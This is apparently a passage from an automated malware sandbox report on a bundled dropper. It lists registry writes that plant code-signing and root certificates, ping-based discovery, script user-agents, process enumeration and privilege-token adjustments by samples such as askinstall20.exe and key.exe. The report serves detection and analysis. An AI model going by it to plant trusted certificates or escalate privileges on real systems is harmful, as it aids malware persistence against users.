20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = 0f00000001000000140000001e427a3639cce4c27e94b1777964ca289a722cad09000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b06010505070308620000000100000020000000d8e0febc1db2e38d00940f37d27d41344d993e734b99d5656d9778d4d81436247f0000000100000016000000301406082b0601050507030906082b060105050703011400000001000000140000006daa9b0987c4d0d422ed4007374d19f191ffded31d000000010000001000000096f98b6e79a74810ce7d398a82f977780b000000010000000e000000430065007200740075006d0000007e00000001000000080000000000cf97a737d6010300000001000000140000006252dc40f71143a22fde9ef7348e064251b181182000000001000000100300003082030c308201f4a0030201020203010020300d06092a864886f70d0101050500303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d204341301e170d3032303631313130343633395a170d3237303631313130343633395a303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ceb1c12ed34f7ccd25ce183e4fc48c6f806a73c85b51f89bd2dcbb005cb1a0fc7503ee81f088ee2352e9e615338dac2d09c576f92b398089e4974b90a5a878f873437ba461b0d858cce16c667e9cf3095e556384d5a8eff3b12e3068b3c43cd8ac6e8d995a904e34dc369a8f818850b76d964209f3d795830d414bb06a6bf8fc0f7e629f67c4ed265f10260f084ff0a45728ce8fb8ed45f66eee255daa6e39bee4932fd947a072ebfaa65bafca533fe20ec69656116ef7e966a926d87f9553ed0a8588ba4f29a5428c5eb6fc852000aa680ba11a85019cc446638288b622b1eefeaa46597ecf352cd5b6da5df748331454b6ebd96fcecd88d6ab1bda963b1d590203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100b88dceefe714bacfeeb044926cb4393ea2846eadb82177d2d4778287e6204181eee2f811b763d11737be1976241c041a4ceb3daa676f2dd4cdfe653170c51ba6020aba607b6d58c29a49fe63320b6be33ac0acab3bb0e8d309518c1083c634e0c52be01ab66014276c32778cbcb27298cfcdcc3fb9c8244214d657fce62643a91de58090ce0354283ef73fd3f84ded6a0a3a93139b3b142313639c3fd1872779e54c51e301ad855d1a3bb1d57310a4d3f2bc6e64f55a5690a8c70e4c740f2e713bf7c847f4696f15f2115e831e9c7c52aefd02da12a8596718dbbc70dd9bb169ed80ce8940486a0e35ca29661521942ce8602a9b854a40f36b8a24ec06162c73	AwesomePoolU1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	vpn.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = 1900000001000000100000000b6cd9778e41ad67fd6be0a6903710440300000001000000140000006252dc40f71143a22fde9ef7348e064251b181187e00000001000000080000000000cf97a737d6010b000000010000000e000000430065007200740075006d0000001d000000010000001000000096f98b6e79a74810ce7d398a82f977781400000001000000140000006daa9b0987c4d0d422ed4007374d19f191ffded37f0000000100000016000000301406082b0601050507030906082b06010505070301620000000100000020000000d8e0febc1db2e38d00940f37d27d41344d993e734b99d5656d9778d4d814362409000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000001e427a3639cce4c27e94b1777964ca289a722cad2000000001000000100300003082030c308201f4a0030201020203010020300d06092a864886f70d0101050500303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d204341301e170d3032303631313130343633395a170d3237303631313130343633395a303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ceb1c12ed34f7ccd25ce183e4fc48c6f806a73c85b51f89bd2dcbb005cb1a0fc7503ee81f088ee2352e9e615338dac2d09c576f92b398089e4974b90a5a878f873437ba461b0d858cce16c667e9cf3095e556384d5a8eff3b12e3068b3c43cd8ac6e8d995a904e34dc369a8f818850b76d964209f3d795830d414bb06a6bf8fc0f7e629f67c4ed265f10260f084ff0a45728ce8fb8ed45f66eee255daa6e39bee4932fd947a072ebfaa65bafca533fe20ec69656116ef7e966a926d87f9553ed0a8588ba4f29a5428c5eb6fc852000aa680ba11a85019cc446638288b622b1eefeaa46597ecf352cd5b6da5df748331454b6ebd96fcecd88d6ab1bda963b1d590203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100b88dceefe714bacfeeb044926cb4393ea2846eadb82177d2d4778287e6204181eee2f811b763d11737be1976241c041a4ceb3daa676f2dd4cdfe653170c51ba6020aba607b6d58c29a49fe63320b6be33ac0acab3bb0e8d309518c1083c634e0c52be01ab66014276c32778cbcb27298cfcdcc3fb9c8244214d657fce62643a91de58090ce0354283ef73fd3f84ded6a0a3a93139b3b142313639c3fd1872779e54c51e301ad855d1a3bb1d57310a4d3f2bc6e64f55a5690a8c70e4c740f2e713bf7c847f4696f15f2115e831e9c7c52aefd02da12a8596718dbbc70dd9bb169ed80ce8940486a0e35ca29661521942ce8602a9b854a40f36b8a24ec06162c73	AwesomePoolU1.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

2124 PING.EXE
240 PING.EXE
4380 PING.EXE

pid	process
2124	PING.EXE
240	PING.EXE
4380	PING.EXE

Script User-Agent 10 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	99	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	173	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	361	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	365	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	452	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	113	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	181	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	439	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	680	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	685	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

key.exemultitimer.exefile.exeCDB6.tmp.exe

pid	process
3136	key.exe
3136	key.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
672	multitimer.exe
2164	file.exe
2164	file.exe
3916	CDB6.tmp.exe
3916	CDB6.tmp.exe
2164	file.exe
2164	file.exe
2164	file.exe
2164	file.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2624
Suspicious behavior: LoadsDriver 6 IoCs

Processes:

app.exesetup.exeDllHost.exesetup.exe

pid process

4128 app.exe
5916 setup.exe
6444 DllHost.exe
648
648
4568 setup.exe

pid	process
2624

pid	process
4128	app.exe
5916	setup.exe
6444	DllHost.exe
648
648
4568	setup.exe

Suspicious behavior: MapViewOfSection 44 IoCs

Processes:

reg.exeprivacytools5.exeprivacytools5.exeexplorer.exeexplorer.exeexplorer.exeMicrosoftEdgeCP.exe

pid	process
1140	reg.exe
1140	reg.exe
7404	privacytools5.exe
1420	privacytools5.exe
2624
2624
2624
2624
2624
2624
2624
2624
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
2624
2624
2624
2624
7068	explorer.exe
7068	explorer.exe
2624
2624
4272	explorer.exe
4272	explorer.exe
7068	explorer.exe
7068	explorer.exe
2624
2624
7920	explorer.exe
7920	explorer.exe
7068	explorer.exe
7068	explorer.exe
7920	explorer.exe
7920	explorer.exe
7920	explorer.exe
7920	explorer.exe
4272	explorer.exe
4272	explorer.exe
2624
2624
5608	MicrosoftEdgeCP.exe
5608	MicrosoftEdgeCP.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

7577180.83

pid process

6860 7577180.83

pid	process
6860	7577180.83

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exeaskinstall20.exemultitimer.exekey.exemultitimer.exe

description	pid	process
Token: SeDebugPrivilege	584	taskkill.exe
Token: SeCreateTokenPrivilege	2052	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	2052	askinstall20.exe
Token: SeLockMemoryPrivilege	2052	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	2052	askinstall20.exe
Token: SeMachineAccountPrivilege	2052	askinstall20.exe
Token: SeTcbPrivilege	2052	askinstall20.exe
Token: SeSecurityPrivilege	2052	askinstall20.exe
Token: SeTakeOwnershipPrivilege	2052	askinstall20.exe
Token: SeLoadDriverPrivilege	2052	askinstall20.exe
Token: SeSystemProfilePrivilege	2052	askinstall20.exe
Token: SeSystemtimePrivilege	2052	askinstall20.exe
Token: SeProfSingleProcessPrivilege	2052	askinstall20.exe
Token: SeIncBasePriorityPrivilege	2052	askinstall20.exe
Token: SeCreatePagefilePrivilege	2052	askinstall20.exe
Token: SeCreatePermanentPrivilege	2052	askinstall20.exe
Token: SeBackupPrivilege	2052	askinstall20.exe
Token: SeRestorePrivilege	2052	askinstall20.exe
Token: SeShutdownPrivilege	2052	askinstall20.exe
Token: SeDebugPrivilege	2052	askinstall20.exe
Token: SeAuditPrivilege	2052	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	2052	askinstall20.exe
Token: SeChangeNotifyPrivilege	2052	askinstall20.exe
Token: SeRemoteShutdownPrivilege	2052	askinstall20.exe
Token: SeUndockPrivilege	2052	askinstall20.exe
Token: SeSyncAgentPrivilege	2052	askinstall20.exe
Token: SeEnableDelegationPrivilege	2052	askinstall20.exe
Token: SeManageVolumePrivilege	2052	askinstall20.exe
Token: SeImpersonatePrivilege	2052	askinstall20.exe
Token: SeCreateGlobalPrivilege	2052	askinstall20.exe
Token: 31	2052	askinstall20.exe
Token: 32	2052	askinstall20.exe
Token: 33	2052	askinstall20.exe
Token: 34	2052	askinstall20.exe
Token: 35	2052	askinstall20.exe
Token: SeDebugPrivilege	584	taskkill.exe
Token: SeDebugPrivilege	2924	multitimer.exe
Token: SeImpersonatePrivilege	3136	key.exe
Token: SeTcbPrivilege	3136	key.exe
Token: SeChangeNotifyPrivilege	3136	key.exe
Token: SeCreateTokenPrivilege	3136	key.exe
Token: SeBackupPrivilege	3136	key.exe
Token: SeRestorePrivilege	3136	key.exe
Token: SeIncreaseQuotaPrivilege	3136	key.exe
Token: SeAssignPrimaryTokenPrivilege	3136	key.exe
Token: SeDebugPrivilege	672	multitimer.exe
Token: SeImpersonatePrivilege	3136	key.exe
Token: SeTcbPrivilege	3136	key.exe
Token: SeChangeNotifyPrivilege	3136	key.exe
Token: SeCreateTokenPrivilege	3136	key.exe
Token: SeBackupPrivilege	3136	key.exe
Token: SeRestorePrivilege	3136	key.exe
Token: SeIncreaseQuotaPrivilege	3136	key.exe
Token: SeAssignPrimaryTokenPrivilege	3136	key.exe
Token: SeImpersonatePrivilege	3136	key.exe
Token: SeTcbPrivilege	3136	key.exe
Token: SeChangeNotifyPrivilege	3136	key.exe
Token: SeCreateTokenPrivilege	3136	key.exe
Token: SeBackupPrivilege	3136	key.exe
Token: SeRestorePrivilege	3136	key.exe
Token: SeIncreaseQuotaPrivilege	3136	key.exe
Token: SeAssignPrimaryTokenPrivilege	3136	key.exe
Token: SeImpersonatePrivilege	3136	key.exe
Token: SeTcbPrivilege	3136	key.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

Setup3310.tmpvpn.tmponaqkq5mwmg.tmpIBInstaller_97039.tmpvict.tmp

pid	process
4524	Setup3310.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
